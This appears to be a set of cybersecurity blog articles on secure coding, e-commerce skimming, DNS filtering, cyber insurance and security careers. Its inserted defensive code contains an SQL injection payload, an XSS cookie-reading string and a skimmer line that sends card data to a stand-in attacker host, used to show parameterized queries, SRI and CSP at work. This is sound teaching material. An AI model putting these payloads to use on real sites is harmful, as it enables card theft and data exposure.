What Developers Need to Fight the Battle Against Common Vulnerabilities


Today’s threat landscape is constantly evolving, and organizations in every sector now have a critical need to consistently produce and maintain secure software. While some verticals, such as the finance industry, have been subject to regulatory and compliance requirements for some time, attention to cybersecurity best practices is rising at the highest levels of government, with the US, UK, and Australia all recently emphasizing the need for secure development at every stage of the SDLC.

Despite this, attackers keep finding new ways to bypass even the most advanced protections and defenses. Many have shifted their focus from delivering malware to compromising APIs or attacking the software supply chain. And while those high-profile incidents are happening with greater frequency, so are simpler exploits like cross-site scripting (XSS) and SQL injection, both of which have plagued defenders for decades. Just last month, a critical SQL injection vulnerability was reported in a WooCommerce WordPress plugin, with a CVSS severity rating of 9.8 out of 10.
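As an added illustration of the injection class the article refers to (example code written for this page, not from the article or from Secure Code Warrior), here is a vulnerable string-built lookup beside its parameterized fix, run against an in-memory SQLite table. The table, its rows and the `x' OR '1'='1` payload are constructed for the demonstration:

```python
"""Added example (not from the article): SQL injection, vulnerable vs. fixed.
The users table, its rows and the payload are constructed for this demo."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample database: two users in an in-memory SQLite file."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable: untrusted input is spliced into the statement text, so the
    attacker can close the quoted literal and append their own SQL."""
    sql = f"SELECT name, email FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, name: str) -> list:
    """Fixed: the value travels to the engine separately from the statement
    and can only ever be compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()


# Constructed injection payload: the first quote closes the literal, the OR
# makes the WHERE clause true for every row, the last quote re-balances it.
PAYLOAD = "x' OR '1'='1"


def demo() -> dict:
    """Run the legitimate lookup and the payload through both versions."""
    conn = build_db()
    return {
        "legit": lookup_parameterized(conn, "alice"),
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),
        "fixed": lookup_parameterized(conn, PAYLOAD),
    }


if __name__ == "__main__":
    result = demo()
    print("normal lookup:", result["legit"])
    print("payload in string-built query:", result["vulnerable"])   # every row leaks
    print("payload in parameterized query:", result["fixed"])       # no rows
```

The string-built query returns every row because the payload rewrote the `WHERE` clause; the parameterized query returns nothing because the driver compares the whole payload as a literal name. The same discipline (never concatenate untrusted input into a statement) is what a developer-training program needs to make second nature.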

It is becoming apparent that while security platforms and defenses are critical components of protection against modern attacks, what is truly needed is code that is deployed free of vulnerabilities in the first place. That requires a deliberate and committed lift in secure coding standards, carried out by security-aware developers.

Many developers say they are willing to champion security and commit to higher standards of code quality and secure output, but they cannot do it alone. We cannot afford to ignore developer needs in the fight against common vulnerabilities: they need right-fit tools and training, as well as a rework of the traditional metrics by which their employers and organizations judge them.

Why Most Developers Don’t Already Prioritize Security

Coding best practices have evolved over the years in response to business needs and market trends. In the past, most applications were built with the so-called waterfall model, in which software engineers worked to get their code through an ordered series of milestones before moving on to the next phase of development. Waterfall was intended to produce programs that, having passed every milestone along the way, were free of bugs and operational flaws by the time they reached production. But by today’s standards it was painfully slow, sometimes taking 18 months or more from the start of a project to the finish line, and that is not going to fly in most companies today.

Agile largely replaced waterfall, placing much greater emphasis on speed. It was followed by DevOps, which is built for even more speed by combining development and operations so that programs are ready for production almost as soon as they clear the final development tweaks.

Putting speed ahead of security, and of nearly everything else beyond functionality, was seen as a necessity as the business environment evolved. In a cloud-based world where everyone is online all the time and millions of mobile transactions happen every few seconds, pushing software through the continuous integration and continuous delivery (CI/CD) pipeline and into production as quickly as possible is mission critical for businesses.

It’s not that organizations didn’t care about security. It’s just that in the competitive business environment that exists in most industries, speed was seen as more important. And developers who could match that speed thrived to the point where it became the primary means by which their job performance was judged.

Now that advanced attacks are ramping up so dramatically, deploying vulnerable code is becoming a liability. The preference is shifting again, with security increasingly the primary focus of software development and speed a close second. Bolting on security after the fact is not only dangerous, it also slows delivery. That has led to the rise of DevSecOps, which merges speed and security to produce secure code and treats security as a shared responsibility. But developers trained for pure speed cannot become functionally security-aware without substantial support from their organizations.

What Developers Need to Truly Make an Impact on Vulnerability Reduction

The good news is that most developers want to see a shift to secure coding and a reprioritizing of security within the development process. In a survey conducted by Evans Data earlier this year of over 1,200 professional developers working around the world, the overwhelming majority said they supported the idea of creating secure code, and most expected it to become a priority in their organizations. However, only 8% of respondents said that writing secure code was easy. That leaves a lot of room for improvement between where most development teams are today and where they need to be.

Simply mandating secure code will not get the job done, and without effort to build the right skills and awareness, a mandate will be highly disruptive to developers’ workflow. Development teams need an environment that nurtures a security mindset and promotes a culture of shared responsibility.

The biggest need is better training, followed by tools that make secure coding a seamless part of the workflow. The program should be tiered: less experienced developers begin by learning to recognize the common vulnerability classes that creep into code, with plenty of hands-on practice and examples, while more advanced developers who have demonstrated their security skills can take on more complex bugs and even threat modeling.

In addition to funding and supporting training programs, including giving developers enough time away from coding to properly participate in them, organizations also need to change the way developers are evaluated. The primary metric for rewarding developers needs to shift away from raw speed toward producing code that is free of known vulnerabilities. Speed can still be an evaluated factor, but first and foremost code needs to be secure, and modern development needs to forge a path where security at speed is no longer a myth.

Shipping insecure or vulnerable code should not be an acceptable business risk, and bolting on security after the fact is becoming increasingly ineffective. Thankfully, the best weapon to fight this disturbing trend is having the developer community produce secure code that attackers can’t exploit. Most developers are willing to step up to that challenge; give them the support to make it happen.

Secure Code Warrior is one of four companies named in the Gartner® Cool Vendors™ in Software Engineering: Enhancing Developer Productivity report. We’re ready to help development teams navigate the complexities of secure software development with tools that make sense in their world. Learn more.

Note — This article was written and contributed by Matias Madou, CTO & Co-Founder, Secure Code Warrior.

Top Cyber Threats Facing E-Commerce Sites This Holiday Season

Delivering a superior customer experience is essential for any e-commerce business, and for those companies there is a lot at stake this holiday season. According to Digital Commerce 360, nearly $1.00 of every $4.00 spent on retail purchases during the 2022 holiday season will be spent online, amounting to $224 billion in e-commerce sales. To be ready for the holiday rush, it is vital that your e-commerce site is secure.

While safety and security are top priorities for businesses of all sizes, they are essential for those that operate in e-commerce. To deliver the experience customers crave, many websites embed third-party solutions at every stage of the customer journey. In fact, for certain e-commerce businesses, their suite of third-party plugins is how they create and sustain a competitive advantage.

Yet many e-commerce sites are inherently insecure and vulnerable to attack because they rely on third-party code they have not vetted and cannot monitor. Consequently, client-side security is a weak point for many e-commerce sites, allowing security incidents to occur directly in the customer’s browser without the customer realizing it.

Attackers exploit client-side weaknesses through e-skimming, formjacking, and cross-site scripting. These attacks can compromise customer data such as credit card numbers, personal information, and login credentials, and they can lead to financial loss for the e-commerce business and to regulatory compliance violations.

In an e-skimming attack, criminals inject code into a page that handles a customer’s credit card data so that it copies the card details as they are entered and sends them to a server the attacker controls. Because the skimming runs in the customer’s browser rather than on the merchant’s servers, the business cannot observe the attack firsthand and react quickly.

Many e-commerce sites rely heavily on forms to gather customer data. Formjacking inserts the attacker between the customer and the merchant, letting the attacker read and record any data a customer submits through the compromised form.

Cross-site scripting injects malicious script into a page on the client side. The script runs in the browser when a customer visits the site, allowing the attacker to harvest the customer’s personal, financial, and session data.

The proliferation of insecure third-party apps and the inability to observe an attack carried out on the client side give attackers enticing targets. That the attackers exploited weaknesses in third-party plugins rather than in the e-commerce site itself means little, if anything, to the individual who is victimized. Since the attack took place via the website, most customers will hold the site owner responsible for securing the interaction.

To improve client-side security, e-commerce companies should minimize their reliance on third-party code wherever they can do so without hurting the user experience, choose well-established third-party solutions with a demonstrated commitment to security, and, as with every type of software, patch plugins and apps as soon as fixes become available.
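Two of the browser-enforced controls a practitioner would reach for against the e-skimming, formjacking and XSS attacks described above, shown as added example code written for this page rather than anything from the article or from Feroot. The first pins a third-party script with Subresource Integrity so a modified copy will not execute; the second builds a Content Security Policy whose `connect-src` and `form-action` directives stop injected code from sending captured card data to an unlisted host, with a small checker that approximates the browser’s host-matching decision. The `render_review` helper shows the output encoding that closes the XSS hole. All hostnames and script bodies are constructed for the demonstration:

```python
"""Added example (not from the article): SRI pinning, a CSP allowlist and
output encoding for a checkout page that embeds third-party scripts.
Hostnames and script bodies below are constructed for the demo."""
import base64
import hashlib
import html

# Constructed stand-ins: the vendored payment widget as reviewed, and a
# tampered copy that appends a skimmer posting card data to an attacker host.
TRUSTED_SCRIPT = b"window.Pay = { mount: function (el) { el.innerHTML = 'pay'; } };"
SKIMMED_SCRIPT = TRUSTED_SCRIPT + (
    b"\nfetch('https://evil-collector.example/c?d=' + document.forms[0].card.value);"
)


def sri_integrity(script_body: bytes, algo: str = "sha384") -> str:
    """Value for <script integrity="..."> once the third-party script is pinned."""
    digest = hashlib.new(algo, script_body).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def sri_check(script_body: bytes, integrity: str) -> bool:
    """What the browser does on load: refuse to run a script whose hash differs."""
    algo, _, _ = integrity.partition("-")
    return sri_integrity(script_body, algo) == integrity


def build_csp(script_hosts, connect_hosts, form_hosts) -> str:
    """CSP limiting where scripts load from, where fetch/XHR may send data and
    where forms may post. Injected code that exfiltrates to an unlisted host
    is blocked by the browser, whichever of those channels it tries."""
    def sources(hosts):
        return " ".join(["'self'", *hosts])
    return "; ".join([
        "default-src 'self'",
        f"script-src {sources(script_hosts)}",
        f"connect-src {sources(connect_hosts)}",
        f"form-action {sources(form_hosts)}",
        "object-src 'none'",
        "base-uri 'self'",
    ])


# Directives that never fall back to default-src when absent.
NO_FALLBACK = {"form-action", "base-uri", "frame-ancestors"}


def parse_csp(csp: str) -> dict:
    """Split a policy string into {directive: [source, ...]}."""
    policy = {}
    for directive in csp.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0]] = parts[1:]
    return policy


def csp_allows(csp: str, directive: str, origin: str, page_origin: str) -> bool:
    """Approximate the browser's host-source matching: exact origins and
    'self' only (no wildcards, scheme-only sources, nonces or hashes)."""
    policy = parse_csp(csp)
    if directive in policy:
        sources = policy[directive]
    elif directive in NO_FALLBACK or "default-src" not in policy:
        return True  # nothing in the policy restricts this directive
    else:
        sources = policy["default-src"]
    if not sources or "'none'" in sources:
        return False
    for src in sources:
        if src == "'self'" and origin == page_origin:
            return True
        if src == origin:
            return True
    return False


def render_review(user_text: str) -> str:
    """Output-encode untrusted text before it lands in HTML: the XSS fix."""
    return f'<p class="review">{html.escape(user_text, quote=True)}</p>'


# Constructed policy for a shop at https://shop.example with one pinned
# payment script host, one API host and a dedicated checkout form target.
EXAMPLE_CSP = build_csp(
    ["https://cdn.pay.example"],
    ["https://api.shop.example"],
    ["https://checkout.shop.example"],
)

if __name__ == "__main__":
    pin = sri_integrity(TRUSTED_SCRIPT)
    print("integrity attribute:", pin)
    print("tampered copy accepted?", sri_check(SKIMMED_SCRIPT, pin))
    print("CSP:", EXAMPLE_CSP)
    print("skimmer exfil allowed?", csp_allows(
        EXAMPLE_CSP, "connect-src", "https://evil-collector.example", "https://shop.example"))
    print(render_review("<script>alert(document.cookie)</script>"))
```

SRI only helps for scripts you pin to a reviewed version; a vendor script that changes on every load cannot be pinned and should be treated as the higher-risk dependency the article warns about. The CSP blocks exfiltration to hosts you did not list, but it cannot stop an allowed third-party host that is itself compromised, which is why reducing the number of such hosts matters.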

Additionally, simulating attacks against the company’s own website can uncover attack vectors before criminals exploit them. Adding further layers of customer authentication makes it harder for an attacker to compromise a session.

Security software and applications can also harden your defenses and make it harder for attackers to use client-side vulnerabilities to their advantage. These solutions can uncover security flaws and quickly deploy security measures to mitigate vulnerabilities. They can also detect attacks quickly and lessen a company’s exposure to client-side security risks.

When security flaws exist, sophisticated criminals will eventually find and exploit them at a date and time of their choosing. The massive spike in e-commerce traffic during the holiday season provides attackers with the perfect cover to use these flaws in client-side security to steal personal and financial data with impunity.

Customers expect e-commerce sites to protect their personal and financial data. Client-side security is critical to delivering on that commitment. Third-party plugins and applications form the backbone of countless e-commerce sites. Given their prevalence, it’s easy to overlook their inherent risks. Client-side attacks take advantage of flaws and vulnerabilities, yet to the consumer, the responsibility for security rests with the e-commerce site itself.

Yet, when client-side attacks occur via third-party apps, online merchants are often unaware of their flaws and cannot see when attackers use them to their advantage. For many e-commerce businesses, since the vulnerabilities are out of their direct line of sight, they do not receive the attention they deserve.

Attackers aren’t so short-sighted. Where security flaws and vulnerabilities exist, it’s often only a question of time before they are exploited. E-commerce companies must take proactive steps to understand and mitigate the risks of client-side security vulnerabilities. Otherwise, attackers will continue to take advantage of them, leading to a loss of customer trust and confidence and the potential for financial losses and an increase in regulatory oversight.

To learn what your client-side risk profile looks like, and how you can mitigate those risks, visit www.feroot.com

VPN vs. DNS Security


When you want another layer of protection that does not require a lot of resources, you are most likely choosing between a VPN service and a DNS security solution. Let’s discuss both.

VPN Explained

VPN stands for Virtual Private Network. A VPN hides your IP address and encrypts your traffic by routing it through a server operated by the VPN provider, establishing a protected connection even on public networks. It keeps your activity from being seen by your ISP or by anyone else on the local network, but it does not provide full protection: the provider’s server is the other end of the tunnel and can see where your traffic goes, and malicious content downloaded over the tunnel still reaches your device.

Worth noting, a VPN can give you access to resources that are restricted in your region, but bear in mind that the provider may be collecting your personal data. This problem mostly affects free and cheap VPN services. In addition, depending on the type of VPN, your DNS requests may or may not be routed through the tunnel as well.

Most free VPNs do not even encrypt your data. According to Cybernews, last year 20 million email addresses and other personal data, including location and legal information, were stolen from VPN services.

DNS Security Explained

DNS security works only with DNS requests, not with traffic. Users keep control of their traffic, and the service never has access to it. The goal of DNS security is to stop you from reaching a malicious resource even after you have clicked a link to it: the filtering resolver refuses to return the real address for a harmful domain, so the connection is blocked before anything from that site reaches your network. The limit of this approach is that it only sees name lookups; a device that connects straight to an IP address, or that sends its DNS queries to some other resolver, is not covered.
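As an added example written for this page (not SafeDNS code or anything from the article), here is the core decision such a filtering resolver makes: it looks only at the queried name, matches it and each of its parent domains against a category blocklist, and returns a sinkhole address instead of the real one for anything listed. The blocklist, upstream answers and query names are constructed for the demonstration:

```python
"""Added example (not from SafeDNS or the article): the decision a DNS
filtering resolver makes. It sees only the queried name, never the traffic,
and answers listed names with a sinkhole address instead of the real one.
Blocklist, upstream answers and query names are constructed for the demo."""
from typing import Dict, Iterator, Optional, Tuple

SINKHOLE = "0.0.0.0"

# Constructed policy: domain -> category. Listing a domain covers every name
# beneath it, so "phish-login.example" also blocks "cdn.phish-login.example".
BLOCKLIST: Dict[str, str] = {
    "phish-login.example": "phishing",
    "tracker.example": "ads",
}

# Constructed stand-in for the recursive lookup a real resolver would perform.
UPSTREAM: Dict[str, str] = {
    "shop.example": "203.0.113.10",
    "mail.shop.example": "203.0.113.25",
}


def normalize(name: str) -> str:
    """DNS names are case-insensitive and a trailing dot marks the root."""
    return name.strip().rstrip(".").lower()


def ancestors(name: str) -> Iterator[str]:
    """Yield the name itself, then each parent domain up to the TLD."""
    labels = normalize(name).split(".")
    for i in range(len(labels)):
        yield ".".join(labels[i:])


def classify(name: str, blocklist: Dict[str, str] = BLOCKLIST) -> Optional[str]:
    """Return the category if the name or any parent domain is listed.
    Matching on whole labels means "notphish-login.example" is not caught
    by a "phish-login.example" entry, as a naive substring check would do."""
    for candidate in ancestors(name):
        if candidate in blocklist:
            return blocklist[candidate]
    return None


def resolve(name: str, blocklist: Dict[str, str] = BLOCKLIST,
            upstream: Dict[str, str] = UPSTREAM) -> Tuple[str, str]:
    """Return (answer, action). Blocked names get the sinkhole so the client's
    connection goes nowhere; everything else is forwarded to the upstream."""
    category = classify(name, blocklist)
    if category is not None:
        return SINKHOLE, f"blocked:{category}"
    return upstream.get(normalize(name), "NXDOMAIN"), "allowed"


if __name__ == "__main__":
    for query in ("SHOP.example.", "cdn.phish-login.example",
                  "notphish-login.example", "tracker.example"):
        print(f"{query:28} -> {resolve(query)}")
```

Because the decision is made before any packet is sent to the destination, nothing from the blocked site ever reaches the client, which is the point the article makes. The trade-off is also visible: the function only ever sees a name, so it can do nothing about a connection that never performs a lookup.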

What’s the right choice?

That depends on your needs. If you need access to resources that do not work in your region, a VPN is your choice. Pick a trusted one, otherwise your personal data may be collected or stolen.

However, if you are looking for protection and want to make sure your data stays yours, DNS security is the better fit. As mentioned, the service does not see your personal information: only your DNS queries go to its servers, never your internet traffic. In short, a VPN camouflages the user inside the danger zone, while DNS security, through DNS filtering, keeps the user from entering it at all.

DNS filtering can look too simple to be real protection, but it does the job, and its simplicity is exactly what makes it easy to deploy.

SafeDNS has just updated its cybersecurity categories and implemented real-time statistics, so your browsing, whether at your business or at home, can get even more secure.

You can always start your free trial for 15 days to get the taste of cybersecurity.

Alternatively, you can check out our Unified Threat Management solution if you are searching for multi-layered protection.

A Quick Guide for Small Cybersecurity Teams Looking to Invest in Cyber Insurance


Cyber insurance is a fairly new field in the world of insurance providers and policies, and many security teams are still trying to wrap their heads around it.

What is it, and do they need it? And how much time will they have to spend researching how to integrate cyber insurance into their strategy?

For small security teams, this is particularly challenging as they contend with limited resources.

Luckily, there’s a new eBook dedicated to helping small security teams better understand cyber insurance policies and how they may impact an organization’s cybersecurity measures.

Background

In 1997, the “Internet Security Liability” (ISL) insurance policy was launched at the International Risk Insurance Management Society’s convention in Honolulu. Underwritten by AIG, ISL insurance was designed to protect ecommerce retailers like Amazon that were collecting sensitive customer data and storing it on internal networks. It is credited as one of the very first cyber insurance policies to be made available to businesses.

Now, a quarter of a century later, the cyber insurance market has grown exponentially and covers a wide range of cybersecurity incidents. According to the National Association of Insurance Commissioners (NAIC), the cybersecurity insurance market hit $4.1 billion last year, up 29.1% over the previous year. Industry reports predict the market will reach $11.4 billion by the end of this year and nearly double to $22.3 billion by 2025.

“Last year was a stark reminder that hackers are pivoting — and are succeeding — in deploying new attack strategies,” writes John Farley, managing director of Gallagher, a global insurance consultancy. “There were a wide variety of victims that ranged from global software providers, email platforms, the largest U.S. meat supplier and fuel suppliers that provide nearly half the fuel to the east coast of the U.S. Threat actors have found this vast system of interdependencies to be fertile hunting grounds.”

Organizations with even the smallest cybersecurity teams are now looking at cyber insurance to protect their businesses from cyber attacks.

But investing in cyber insurance is not as easy as adding a new insurance policy.

What is cyber insurance?

Cyber insurance, also referred to as cyber liability insurance or data breach insurance, can help mitigate the costs of cyber attacks – an expense that is growing at an alarming rate. While still not a mandatory expense, cyber insurance is quickly rising to the top of priority lists for many organizations that manage vast amounts of data.

Because a cyber attack can cost a business millions of dollars (IBM reports the average cost of a data breach reached $4.35 million in 2022), businesses that do not invest in cyber insurance are putting their entire enterprise at risk. A cyber insurance policy does not stop an attack, but it can keep one from completely devastating a business.

What does cyber insurance cover?

As with any insurance, there are different forms of cyber insurance covering different threats. The market varies widely, with policy terms set by individual providers, but the primary forms include:

  1. Network security policies, which cover the cost of lawyers, IT forensic services, data restoration, breach notifications and communications, and more when a data breach, malware infection or ransomware incident occurs.
  2. Privacy liability policies, which cover costs related to a data breach that exposes personally identifiable information (PII): lawsuits, compliance violations, reputational risk management, and so on.
  3. Network business interruption policies, which cover data loss and financial losses incurred through a disruption in services.
  4. Errors and omissions policies, similar to network business interruption policies, which cover cyber attacks that jeopardize a business’s ability to deliver services or meet contractual obligations.
  5. Media liability policies, which cover losses resulting from allegations of slander, libel, disparagement, or copyright infringement.

This is not a complete list. Specific terms and conditions are set by each insurer, and claims are often disputed because it can be difficult to establish that a cyber attack occurred, especially when it involves sophisticated cybercrime or social engineering schemes that are hard to identify.

How do existing cybersecurity efforts impact cyber insurance policies?

Before obtaining a cyber insurance policy, a business must be approved for coverage. To limit their own exposure, insurance providers often make coverage contingent on specific cybersecurity measures.

These contingencies usually concern a business’s existing security efforts: for example, that the organization has written security policies in place, uses multi-factor authentication (MFA), and encrypts its data. Providers often dictate which security tools a business must implement and even which security vendors it may partner with.

Such rules directly affect an organization’s cybersecurity program and can create friction between the security team and the business leaders purchasing the policy. The best way to reduce that friction is to make sure the security team is on board from the start and involved in the key decisions that shape the business’s cybersecurity strategy.

Cybersecurity team leads need to understand cyber insurance policies and be able to assess whether or not a tactic required by an insurance provider weakens or strengthens the business’ existing cybersecurity protections.

If your organization is currently evaluating cyber insurance policies, download Cynet’s insurance guide to better understand what’s at stake – both for your cybersecurity team and your business at large.

Download Cynet’s Small Security Team’s Guide to Cyber Insurance.

How To Build a Career as a Freelance Cybersecurity Analyst — From Scratch


With each passing year, the cybersecurity threat landscape continues to worsen. That reality makes cybersecurity analysts some of the most sought-after technology professionals in the world. And there are nowhere near enough of them to meet the demand. At last count, there were over 3.5 million unfilled cybersecurity jobs worldwide — and that number is still growing.

The situation means that it’s a great time to become a cybersecurity analyst. What’s more, the skyrocketing demand means it’s possible to start a lucrative freelance career in the field and take complete control over your professional future. Here’s a start-to-finish guide on how to do exactly that.

Start With the Right Training

The first step on the path to becoming a freelance cybersecurity analyst is to acquire the necessary skills. For those without an existing technology background, the best place to start is with a cybersecurity bootcamp. They’re designed to get newcomers up to speed with basic cybersecurity concepts and skills in the shortest possible time.

A great place to start your search for the right course is Bootcamps.org. They maintain an active directory of both free and paid bootcamp programs in a variety of technology fields, including cybersecurity. Depending on your preexisting familiarity with computing concepts, you may also wish to enroll in a more generalized computing bootcamp to get started.

Your goal is to emerge from these programs with a working knowledge of the following concepts:

  • Networking architecture and design
  • Networking, routing and switching hardware and systems
  • Firewalls and packet sniffing systems
  • Threat detection and analysis methods
  • Common network and software vulnerability types

Earn One or More Cybersecurity Certifications

The next thing you’ll need to do is to earn one or more cybersecurity certifications to demonstrate your abilities to would-be employers. The best approach is to begin with a general cybersecurity certification. You can always earn a more specialized certification later in your career after you gain experience and figure out which aspects of the job you excel at. The most popular general cybersecurity certifications include:

Earning any one of the above certifications will give you the credentials you need to qualify for thousands of already-existing open positions. At the time of this writing, there are over 200,000 active job listings for holders of the above certifications on LinkedIn, Indeed, and Simply Hired alone. In other words — you’ll be ready to join the ranks of professional cybersecurity analysts the moment you’ve earned one of them.

Gameplan to Gain Experience

Even though it’s possible to get some cybersecurity analyst jobs with nothing but the right certifications and an artfully-worded resume — that will only get you so far. Although it’s reasonable to take on an entry-level cybersecurity position to gain some experience at this stage, there are also some other strategies you can use to speed up the process.

One of them is to explore resources like TryHackMe.com, a site with hands-on, real-world hacking labs that expose you to the kinds of situations you will face as a cybersecurity analyst. It is an excellent way to build experience without any risk.

Another strategy you should consider is to attend as many hackathons as you can. Those will give you a front-row seat to see how the best of the best in cybersecurity approach their work. And, they make for excellent networking opportunities that you’ll need to prepare yourself to go freelance later.

At this stage, you should also set yourself up with accounts on the major cloud providers: Google Cloud, Amazon Web Services (AWS), and Microsoft Azure. This will let you build technology stacks on each platform and familiarize yourself with their settings and features. Most businesses today have at least some exposure to one or more of these platforms, and understanding them from a security perspective will improve your marketability as a freelance cybersecurity analyst.

Take On Small Paid Jobs

When you feel comfortable enough in your skill set and experience level to consider transitioning into freelance roles, you should start small. This means taking on some paid cybersecurity jobs through sites like Fiverr and Upwork. You should begin by offering your services in specific areas that your existing experience supports. So, if you feel comfortable conducting penetration testing of a particular app or platform, start there.

The idea is for you to establish yourself as a reliable service provider on those sites. Although it may not seem like you’re getting far — after all, freelance sites aren’t where the real money is — you’ll be building up a reputation for quality work. When you’ve done that, you can parlay that reputation into more lucrative work.

Prepare Your Freelance Business

Once you’ve got enough experience and have a solid resume of small freelance cybersecurity jobs under your belt, you’ll be ready to turn your hard work into a standalone freelance business. The first step toward doing that is to think up a business name. You’ll want a name that’s not already in use, with an available domain name to match. When you have one, reserve the domain name and register for a tax ID with the relevant authorities where you’re planning to work.

Next, you’ll want to design a website to serve as a calling card for your business. Since you’ll be marketing your skills and reputation as a cybersecurity analyst, the site doesn’t need to be anything more than a professional-looking portal with your business name, basic information, and contact details. You can choose a ready-made template if you don’t have the design skills to do the job yourself.

Then, you’ll want to set up your home office with everything you’ll need to work full-time. This means having a dedicated comfortable space with a desk and computer, and all of the relevant office supplies. It’s also a good idea to sign up for a business phone app so you’ll have a professional communications system for your customers to contact you.

Turn To Your Professional Network

At this point, you’re ready to begin soliciting work as a freelance cybersecurity analyst. This is the time when all of the networking you’ve done through hackathons and other events, as well as through your freelance portal jobs, will pay off. You should begin by crafting an announcement of your new business to send out to all of the contacts you’ve collected.

As you do this, be sure to let everyone know exactly what types of cybersecurity jobs you’re equipped to handle. You should also make it clear how potential clients can contact you and request quotes for your services. If you’ve done everything right, you should start to get inquiries in short order. From there, all you have to do is your best work — and it won’t be long until you have enough steady customers that you can quit your day job and go freelance for good.

The Takeaway

The simple fact is, the sheer volume of open cybersecurity jobs — and the countless more that will appear in the next few years — make your odds of success as a freelance cybersecurity analyst quite high. As long as you’re competent, confident, and willing to continue to learn your trade as you work, you’ll never run out of opportunities. Your reward for all of that is a well-paid career with a schedule that you control — and doesn’t that sound like a dream come true?